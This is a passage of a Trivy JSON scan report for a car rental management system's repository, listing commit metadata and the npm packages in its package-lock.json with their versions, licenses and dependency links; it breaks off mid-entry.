{ "SchemaVersion": 2, "Trivy": { "Version": "0.71.0" }, "ReportID": "019ea59c-3133-753b-af16-e80cb5608d14", "CreatedAt": "2026-06-08T05:02:17.395344877Z", "ArtifactID": "sha256:691936359de97fcfb14e381be391e32ba3310d33a7f1581e1bdb2f56ba97c527", "ArtifactName": "/src", "ArtifactType": "repository", "Metadata": { "RepoURL": "https://gitlab.rentaldrivego.ma/rental_car/car_management_system.git", "Branch": "develop", "Commit": "560da1cadffa0898b31c16c202552f4a25fc2eb8", "CommitMsg": "fix prod domain mismatch", "Author": "root \u003cmelabidi@alrahmaisgl.org\u003e", "Committer": "root \u003cmelabidi@alrahmaisgl.org\u003e" }, "Results": [ { "Target": "package-lock.json", "Class": "lang-pkgs", "Type": "npm", "Packages": [ { "ID": "@rentaldrivego/admin@1.0.0", "Name": "@rentaldrivego/admin", "Identifier": { "PURL": "pkg:npm/%40rentaldrivego/admin@1.0.0", "UID": "d35298d4b64ba129" }, "Version": "1.0.0", "Relationship": "direct", "DependsOn": [ "@rentaldrivego/types@1.0.0", "autoprefixer@10.5.0", "dayjs@1.11.20", "lucide-react@0.376.0", "next@14.2.3", "postcss@8.5.12", "react-dom@18.3.1", "react@18.3.1", "recharts@2.15.4", "tailwindcss@3.4.19", "zod@3.25.76" ], "Locations": [ { "StartLine": 26, "EndLine": 48 } ], "AnalyzedBy": "npm" }, { "ID": "@rentaldrivego/api@1.0.0", "Name": "@rentaldrivego/api", "Identifier": { "PURL": "pkg:npm/%40rentaldrivego/api@1.0.0", "UID": "c696fe2674dfb6f4" }, "Version": "1.0.0", "Relationship": "direct", "DependsOn": [ "@react-pdf/renderer@3.4.5", "@rentaldrivego/database@1.0.0", "@rentaldrivego/types@1.0.0", "bcryptjs@2.4.3", "cors@2.8.6", "dayjs@1.11.20", "express-rate-limit@8.5.1", "express@4.22.1", "firebase-admin@12.7.0", "helmet@7.2.0", "ioredis@5.10.1", "jsonwebtoken@9.0.3", "morgan@1.10.1", "multer@1.4.5-lts.2", "node-cron@3.0.3", "nodemailer@6.10.1", "otplib@12.0.1", "qrcode@1.5.4", "react-dom@18.3.1", "react@18.3.1", "resend@3.5.0", "socket.io@4.8.3", "swagger-ui-express@5.0.1", "twilio@5.13.1", "zod-to-json-schema@3.25.2", "zod@3.25.76" ], "Locations": [ { "StartLine": 49, "EndLine": 100 } ], "AnalyzedBy": "npm" }, { "ID": "@rentaldrivego/dashboard@1.0.0", "Name": "@rentaldrivego/dashboard", "Identifier": { "PURL": "pkg:npm/%40rentaldrivego/dashboard@1.0.0", "UID": "5bde7990c35cfae1" }, "Version": "1.0.0", "Relationship": "direct", "DependsOn": [ "@rentaldrivego/types@1.0.0", "autoprefixer@10.5.0", "dayjs@1.11.20", "lucide-react@0.376.0", "next@14.2.3", "postcss@8.5.12", "react-dom@18.3.1", "react@18.3.1", "recharts@2.15.4", "sharp@0.34.5", "socket.io-client@4.8.3", "tailwindcss@3.4.19", "zod@3.25.76" ], "Locations": [ { "StartLine": 101, "EndLine": 125 } ], "AnalyzedBy": "npm" }, { "ID": "@rentaldrivego/database@1.0.0", "Name": "@rentaldrivego/database", "Identifier": { "PURL": "pkg:npm/%40rentaldrivego/database@1.0.0", "UID": "c2a5cc483068b2f5" }, "Version": "1.0.0", "Relationship": "direct", "DependsOn": [ "@prisma/client@5.22.0" ], "Locations": [ { "StartLine": 10745, "EndLine": 10759 } ], "AnalyzedBy": "npm" }, { "ID": "@rentaldrivego/marketplace@1.0.0", "Name": "@rentaldrivego/marketplace", "Identifier": { "PURL": "pkg:npm/%40rentaldrivego/marketplace@1.0.0", "UID": "c79bc63b5513a48a" }, "Version": "1.0.0", "Relationship": "direct", "DependsOn": [ "@rentaldrivego/types@1.0.0", "autoprefixer@10.5.0", "dayjs@1.11.20", "lucide-react@0.376.0", "next@14.2.3", "postcss@8.5.12", "react-dom@18.3.1", "react@18.3.1", "tailwindcss@3.4.19", "zod@3.25.76" ], "Locations": [ { "StartLine": 126, "EndLine": 147 } ], "AnalyzedBy": "npm" }, { "ID": "@rentaldrivego/types@1.0.0", "Name": "@rentaldrivego/types", "Identifier": { "PURL": "pkg:npm/%40rentaldrivego/types@1.0.0", "UID": "dc1e782b69df0db2" }, "Version": "1.0.0", "Relationship": "direct", "Locations": [ { "StartLine": 10760, "EndLine": 10766 } ], "AnalyzedBy": "npm" }, { "ID": "@types/node@20.19.39", "Name": "@types/node", "Identifier": { "PURL": "pkg:npm/%40types/node@20.19.39", "UID": "a32b6ce01d93549" }, "Version": "20.19.39", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "undici-types@6.21.0" ], "Locations": [ { "StartLine": 3001, "EndLine": 3009 } ], "AnalyzedBy": "npm" }, { "ID": "@alloc/quick-lru@5.2.0", "Name": "@alloc/quick-lru", "Identifier": { "PURL": "pkg:npm/%40alloc/quick-lru@5.2.0", "UID": "483fe458bb6d4dc0" }, "Version": "5.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 171, "EndLine": 182 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/runtime@7.29.2", "Name": "@babel/runtime", "Identifier": { "PURL": "pkg:npm/%40babel/runtime@7.29.2", "UID": "34f09bfab37449cb" }, "Version": "7.29.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 183, "EndLine": 191 } ], "AnalyzedBy": "npm" }, { "ID": "@emnapi/runtime@1.10.0", "Name": "@emnapi/runtime", "Identifier": { "PURL": "pkg:npm/%40emnapi/runtime@1.10.0", "UID": "eb6ac96bdbad0612" }, "Version": "1.10.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "tslib@2.4.1" ], "Locations": [ { "StartLine": 216, "EndLine": 225 } ], "AnalyzedBy": "npm" }, { "ID": "@fastify/busboy@3.2.0", "Name": "@fastify/busboy", "Identifier": { "PURL": "pkg:npm/%40fastify/busboy@3.2.0", "UID": "82ee8887ea95cd8a" }, "Version": "3.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 680, "EndLine": 685 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/app-check-interop-types@0.3.2", "Name": "@firebase/app-check-interop-types", "Identifier": { "PURL": "pkg:npm/%40firebase/app-check-interop-types@0.3.2", "UID": "bc44e10305966d7b" }, "Version": "0.3.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 686, "EndLine": 691 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/app-types@0.9.2", "Name": "@firebase/app-types", "Identifier": { "PURL": "pkg:npm/%40firebase/app-types@0.9.2", "UID": "5e2810a135124154" }, "Version": "0.9.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 692, "EndLine": 697 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/auth-interop-types@0.2.3", "Name": "@firebase/auth-interop-types", "Identifier": { "PURL": "pkg:npm/%40firebase/auth-interop-types@0.2.3", "UID": "830c369522baa256" }, "Version": "0.2.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 698, "EndLine": 703 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/component@0.6.9", "Name": "@firebase/component", "Identifier": { "PURL": "pkg:npm/%40firebase/component@0.6.9", "UID": "1f726b75b1ed4e31" }, "Version": "0.6.9", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/util@1.10.0", "tslib@2.4.1" ], "Locations": [ { "StartLine": 704, "EndLine": 713 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/database@1.0.8", "Name": "@firebase/database", "Identifier": { "PURL": "pkg:npm/%40firebase/database@1.0.8", "UID": "77dc64733a61454f" }, "Version": "1.0.8", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-check-interop-types@0.3.2", "@firebase/auth-interop-types@0.2.3", "@firebase/component@0.6.9", "@firebase/logger@0.4.2", "@firebase/util@1.10.0", "faye-websocket@0.11.4", "tslib@2.4.1" ], "Locations": [ { "StartLine": 714, "EndLine": 728 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/database-compat@1.0.8", "Name": "@firebase/database-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/database-compat@1.0.8", "UID": "1c352acb296f42ac" }, "Version": "1.0.8", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.6.9", "@firebase/database-types@1.0.5", "@firebase/database@1.0.8", "@firebase/logger@0.4.2", "@firebase/util@1.10.0", "tslib@2.4.1" ], "Locations": [ { "StartLine": 729, "EndLine": 742 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/database-types@1.0.5", "Name": "@firebase/database-types", "Identifier": { "PURL": "pkg:npm/%40firebase/database-types@1.0.5", "UID": "ac7a34693418ee16" }, "Version": "1.0.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-types@0.9.2", "@firebase/util@1.10.0" ], "Locations": [ { "StartLine": 743, "EndLine": 752 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/logger@0.4.2", "Name": "@firebase/logger", "Identifier": { "PURL": "pkg:npm/%40firebase/logger@0.4.2", "UID": "1a2f315c7724c731" }, "Version": "0.4.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "tslib@2.4.1" ], "Locations": [ { "StartLine": 753, "EndLine": 761 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/util@1.10.0", "Name": "@firebase/util", "Identifier": { "PURL": "pkg:npm/%40firebase/util@1.10.0", "UID": "fd8614cc4ff27178" }, "Version": "1.10.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "tslib@2.4.1" ], "Locations": [ { "StartLine": 762, "EndLine": 770 } ], "AnalyzedBy": "npm" }, { "ID": "@google-cloud/firestore@7.11.6", "Name": "@google-cloud/firestore", "Identifier": { "PURL": "pkg:npm/%40google-cloud/firestore@7.11.6", "UID": "1b8c4bc27084faf0" }, "Version": "7.11.6", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@opentelemetry/api@1.9.1", "fast-deep-equal@3.1.3", "functional-red-black-tree@1.0.1", "google-gax@4.6.1", "protobufjs@7.5.6" ], "Locations": [ { "StartLine": 771, "EndLine": 787 } ], "AnalyzedBy": "npm" }, { "ID": "@google-cloud/paginator@5.0.2", "Name": "@google-cloud/paginator", "Identifier": { "PURL": "pkg:npm/%40google-cloud/paginator@5.0.2", "UID": "ac6e2e012eeab4ec" }, "Version": "5.0.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "arrify@2.0.1", "extend@3.0.2" ], "Locations": [ { "StartLine": 788, "EndLine": 801 } ], "AnalyzedBy": "npm" }, { "ID": "@google-cloud/projectify@4.0.0", "Name": "@google-cloud/projectify", "Identifier": { "PURL": "pkg:npm/%40google-cloud/projectify@4.0.0", "UID": "9dbf779c7574e627" }, "Version": "4.0.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 802, "EndLine": 811 } ], "AnalyzedBy": "npm" }, { "ID": "@google-cloud/promisify@4.0.0", "Name": "@google-cloud/promisify", "Identifier": { "PURL": "pkg:npm/%40google-cloud/promisify@4.0.0", "UID": "d54a22e542a2e48e" }, "Version": "4.0.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 812, "EndLine": 821 } ], "AnalyzedBy": "npm" }, { "ID": "@google-cloud/storage@7.19.0", "Name": "@google-cloud/storage", "Identifier": { "PURL": "pkg:npm/%40google-cloud/storage@7.19.0", "UID": "c3066a9916e4a56e" }, "Version": "7.19.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@google-cloud/paginator@5.0.2", "@google-cloud/projectify@4.0.0", "@google-cloud/promisify@4.0.0", "abort-controller@3.0.0", "async-retry@1.3.3", "duplexify@4.1.3", "fast-xml-parser@5.7.2", "gaxios@6.7.1", "google-auth-library@9.15.1", "html-entities@2.6.0", "mime@3.0.0", "p-limit@3.1.0", "retry-request@7.0.2", "teeny-request@9.0.0", "uuid@8.3.2" ], "Locations": [ { "StartLine": 822, "EndLine": 848 } ], "AnalyzedBy": "npm" }, { "ID": "@grpc/grpc-js@1.14.3", "Name": "@grpc/grpc-js", "Identifier": { "PURL": "pkg:npm/%40grpc/grpc-js@1.14.3", "UID": "2d5680a72979631f" }, "Version": "1.14.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@grpc/proto-loader@0.8.0", "@js-sdsl/ordered-map@4.4.2" ], "Locations": [ { "StartLine": 860, "EndLine": 873 } ], "AnalyzedBy": "npm" }, { "ID": "@grpc/proto-loader@0.7.15", "Name": "@grpc/proto-loader", "Identifier": { "PURL": "pkg:npm/%40grpc/proto-loader@0.7.15", "UID": "f43d0c3ac9c5ee79" }, "Version": "0.7.15", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "lodash.camelcase@4.3.0", "long@5.3.2", "protobufjs@7.5.6", "yargs@17.7.2" ], "Locations": [ { "StartLine": 893, "EndLine": 911 } ], "AnalyzedBy": "npm" }, { "ID": "@grpc/proto-loader@0.8.0", "Name": "@grpc/proto-loader", "Identifier": { "PURL": "pkg:npm/%40grpc/proto-loader@0.8.0", "UID": "d801fe7d5a77a449" }, "Version": "0.8.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "lodash.camelcase@4.3.0", "long@5.3.2", "protobufjs@7.5.6", "yargs@17.7.2" ], "Locations": [ { "StartLine": 874, "EndLine": 892 } ], "AnalyzedBy": "npm" }, { "ID": "@img/colour@1.1.0", "Name": "@img/colour", "Identifier": { "PURL": "pkg:npm/%40img/colour@1.1.0", "UID": "ad6960a7c6467161" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 950, "EndLine": 958 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-darwin-arm64@0.34.5", "Name": "@img/sharp-darwin-arm64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-darwin-arm64@0.34.5", "UID": "73594c8737a59789" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/sharp-libvips-darwin-arm64@1.2.4" ], "Locations": [ { "StartLine": 959, "EndLine": 980 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-darwin-x64@0.34.5", "Name": "@img/sharp-darwin-x64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-darwin-x64@0.34.5", "UID": "15b9ee4816030845" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/sharp-libvips-darwin-x64@1.2.4" ], "Locations": [ { "StartLine": 981, "EndLine": 1002 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-libvips-darwin-arm64@1.2.4", "Name": "@img/sharp-libvips-darwin-arm64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-libvips-darwin-arm64@1.2.4", "UID": "9d5fe0469b216c04" }, "Version": "1.2.4", "Licenses": [ "LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1003, "EndLine": 1018 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-libvips-darwin-x64@1.2.4", "Name": "@img/sharp-libvips-darwin-x64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-libvips-darwin-x64@1.2.4", "UID": "dec2e88b24968f97" }, "Version": "1.2.4", "Licenses": [ "LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1019, "EndLine": 1034 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-libvips-linux-arm@1.2.4", "Name": "@img/sharp-libvips-linux-arm", "Identifier": { "PURL": "pkg:npm/%40img/sharp-libvips-linux-arm@1.2.4", "UID": "a1651783409be564" }, "Version": "1.2.4", "Licenses": [ "LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1035, "EndLine": 1050 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-libvips-linux-arm64@1.2.4", "Name": "@img/sharp-libvips-linux-arm64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-libvips-linux-arm64@1.2.4", "UID": "365e5d3e1dd49f67" }, "Version": "1.2.4", "Licenses": [ "LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1051, "EndLine": 1066 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-libvips-linux-ppc64@1.2.4", "Name": "@img/sharp-libvips-linux-ppc64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-libvips-linux-ppc64@1.2.4", "UID": "b9fe88386f520556" }, "Version": "1.2.4", "Licenses": [ "LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1067, "EndLine": 1082 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-libvips-linux-riscv64@1.2.4", "Name": "@img/sharp-libvips-linux-riscv64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-libvips-linux-riscv64@1.2.4", "UID": "7306515e6d0d4cb5" }, "Version": "1.2.4", "Licenses": [ "LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1083, "EndLine": 1098 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-libvips-linux-s390x@1.2.4", "Name": "@img/sharp-libvips-linux-s390x", "Identifier": { "PURL": "pkg:npm/%40img/sharp-libvips-linux-s390x@1.2.4", "UID": "8f8abfd5cf60a753" }, "Version": "1.2.4", "Licenses": [ "LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1099, "EndLine": 1114 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-libvips-linux-x64@1.2.4", "Name": "@img/sharp-libvips-linux-x64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-libvips-linux-x64@1.2.4", "UID": "7787bd3bbad66a9c" }, "Version": "1.2.4", "Licenses": [ "LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1115, "EndLine": 1130 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-libvips-linuxmusl-arm64@1.2.4", "Name": "@img/sharp-libvips-linuxmusl-arm64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-libvips-linuxmusl-arm64@1.2.4", "UID": "daef61b3ba5c54e2" }, "Version": "1.2.4", "Licenses": [ "LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1131, "EndLine": 1146 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-libvips-linuxmusl-x64@1.2.4", "Name": "@img/sharp-libvips-linuxmusl-x64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-libvips-linuxmusl-x64@1.2.4", "UID": "a23b08285d680b1b" }, "Version": "1.2.4", "Licenses": [ "LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1147, "EndLine": 1162 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-linux-arm@0.34.5", "Name": "@img/sharp-linux-arm", "Identifier": { "PURL": "pkg:npm/%40img/sharp-linux-arm@0.34.5", "UID": "3b65a197cb3d2e5e" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/sharp-libvips-linux-arm@1.2.4" ], "Locations": [ { "StartLine": 1163, "EndLine": 1184 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-linux-arm64@0.34.5", "Name": "@img/sharp-linux-arm64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-linux-arm64@0.34.5", "UID": "f9c512e353e6dd5b" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/sharp-libvips-linux-arm64@1.2.4" ], "Locations": [ { "StartLine": 1185, "EndLine": 1206 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-linux-ppc64@0.34.5", "Name": "@img/sharp-linux-ppc64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-linux-ppc64@0.34.5", "UID": "41e792f462289dab" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/sharp-libvips-linux-ppc64@1.2.4" ], "Locations": [ { "StartLine": 1207, "EndLine": 1228 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-linux-riscv64@0.34.5", "Name": "@img/sharp-linux-riscv64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-linux-riscv64@0.34.5", "UID": "bf0a060c7b576e8e" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/sharp-libvips-linux-riscv64@1.2.4" ], "Locations": [ { "StartLine": 1229, "EndLine": 1250 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-linux-s390x@0.34.5", "Name": "@img/sharp-linux-s390x", "Identifier": { "PURL": "pkg:npm/%40img/sharp-linux-s390x@0.34.5", "UID": "b9a78d9f6162feaf" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/sharp-libvips-linux-s390x@1.2.4" ], "Locations": [ { "StartLine": 1251, "EndLine": 1272 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-linux-x64@0.34.5", "Name": "@img/sharp-linux-x64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-linux-x64@0.34.5", "UID": "60e2b3d9f1247b9a" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/sharp-libvips-linux-x64@1.2.4" ], "Locations": [ { "StartLine": 1273, "EndLine": 1294 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-linuxmusl-arm64@0.34.5", "Name": "@img/sharp-linuxmusl-arm64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-linuxmusl-arm64@0.34.5", "UID": "2ee64cc62be58aa8" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/sharp-libvips-linuxmusl-arm64@1.2.4" ], "Locations": [ { "StartLine": 1295, "EndLine": 1316 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-linuxmusl-x64@0.34.5", "Name": "@img/sharp-linuxmusl-x64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-linuxmusl-x64@0.34.5", "UID": "b802077030fd6a68" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/sharp-libvips-linuxmusl-x64@1.2.4" ], "Locations": [ { "StartLine": 1317, "EndLine": 1338 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-wasm32@0.34.5", "Name": "@img/sharp-wasm32", "Identifier": { "PURL": "pkg:npm/%40img/sharp-wasm32@0.34.5", "UID": "315d764ed119910e" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0 AND LGPL-3.0-or-later AND MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@emnapi/runtime@1.10.0" ], "Locations": [ { "StartLine": 1339, "EndLine": 1357 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-win32-arm64@0.34.5", "Name": "@img/sharp-win32-arm64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-win32-arm64@0.34.5", "UID": "75c9d9c1e81a5e5d" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0 AND LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1358, "EndLine": 1376 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-win32-ia32@0.34.5", "Name": "@img/sharp-win32-ia32", "Identifier": { "PURL": "pkg:npm/%40img/sharp-win32-ia32@0.34.5", "UID": "c9241f103d3c1752" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0 AND LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1377, "EndLine": 1395 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-win32-x64@0.34.5", "Name": "@img/sharp-win32-x64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-win32-x64@0.34.5", "UID": "c687cc791b97e1e3" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0 AND LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1396, "EndLine": 1414 } ], "AnalyzedBy": "npm" }, { "ID": "@ioredis/commands@1.5.1", "Name": "@ioredis/commands", "Identifier": { "PURL": "pkg:npm/%40ioredis/commands@1.5.1", "UID": "58ecae69a93e2f09" }, "Version": "1.5.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1415, "EndLine": 1420 } ], "AnalyzedBy": "npm" }, { "ID": "@isaacs/cliui@8.0.2", "Name": "@isaacs/cliui", "Identifier": { "PURL": "pkg:npm/%40isaacs/cliui@8.0.2", "UID": "dc08a11b97a9eb85" }, "Version": "8.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "string-width-cjs@4.2.3", "string-width@5.1.2", "strip-ansi-cjs@6.0.1", "strip-ansi@7.2.0", "wrap-ansi-cjs@7.0.0", "wrap-ansi@8.1.0" ], "Locations": [ { "StartLine": 1421, "EndLine": 1437 } ], "AnalyzedBy": "npm" }, { "ID": "@jridgewell/gen-mapping@0.3.13", "Name": "@jridgewell/gen-mapping", "Identifier": { "PURL": "pkg:npm/%40jridgewell/gen-mapping@0.3.13", "UID": "27665c4f814f5e91" }, "Version": "0.3.13", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jridgewell/sourcemap-codec@1.5.5", "@jridgewell/trace-mapping@0.3.31" ], "Locations": [ { "StartLine": 1530, "EndLine": 1539 } ], "AnalyzedBy": "npm" }, { "ID": "@jridgewell/resolve-uri@3.1.2", "Name": "@jridgewell/resolve-uri", "Identifier": { "PURL": "pkg:npm/%40jridgewell/resolve-uri@3.1.2", "UID": "5df8c5a4f363c9b5" }, "Version": "3.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1540, "EndLine": 1548 } ], "AnalyzedBy": "npm" }, { "ID": "@jridgewell/sourcemap-codec@1.5.5", "Name": "@jridgewell/sourcemap-codec", "Identifier": { "PURL": "pkg:npm/%40jridgewell/sourcemap-codec@1.5.5", "UID": "736cc6018e51def4" }, "Version": "1.5.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1549, "EndLine": 1554 } ], "AnalyzedBy": "npm" }, { "ID": "@jridgewell/trace-mapping@0.3.31", "Name": "@jridgewell/trace-mapping", "Identifier": { "PURL": "pkg:npm/%40jridgewell/trace-mapping@0.3.31", "UID": "6c23e5f2c10631c7" }, "Version": "0.3.31", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jridgewell/resolve-uri@3.1.2", "@jridgewell/sourcemap-codec@1.5.5" ], "Locations": [ { "StartLine": 1555, "EndLine": 1564 } ], "AnalyzedBy": "npm" }, { "ID": "@js-sdsl/ordered-map@4.4.2", "Name": "@js-sdsl/ordered-map", "Identifier": { "PURL": "pkg:npm/%40js-sdsl/ordered-map@4.4.2", "UID": "e34b682b2b5e7ea" }, "Version": "4.4.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1565, "EndLine": 1575 } ], "AnalyzedBy": "npm" }, { "ID": "@next/env@14.2.3", "Name": "@next/env", "Identifier": { "PURL": "pkg:npm/%40next/env@14.2.3", "UID": "f533f45dd6d0a5b2" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1576, "EndLine": 1581 } ], "AnalyzedBy": "npm" }, { "ID": "@next/swc-darwin-arm64@14.2.3", "Name": "@next/swc-darwin-arm64", "Identifier": { "PURL": "pkg:npm/%40next/swc-darwin-arm64@14.2.3", "UID": "9ee845f1c50c9eed" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1582, "EndLine": 1597 } ], "AnalyzedBy": "npm" }, { "ID": "@next/swc-darwin-x64@14.2.3", "Name": "@next/swc-darwin-x64", "Identifier": { "PURL": "pkg:npm/%40next/swc-darwin-x64@14.2.3", "UID": "24dd4a7b019fa44f" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1598, "EndLine": 1613 } ], "AnalyzedBy": "npm" }, { "ID": "@next/swc-linux-arm64-gnu@14.2.3", "Name": "@next/swc-linux-arm64-gnu", 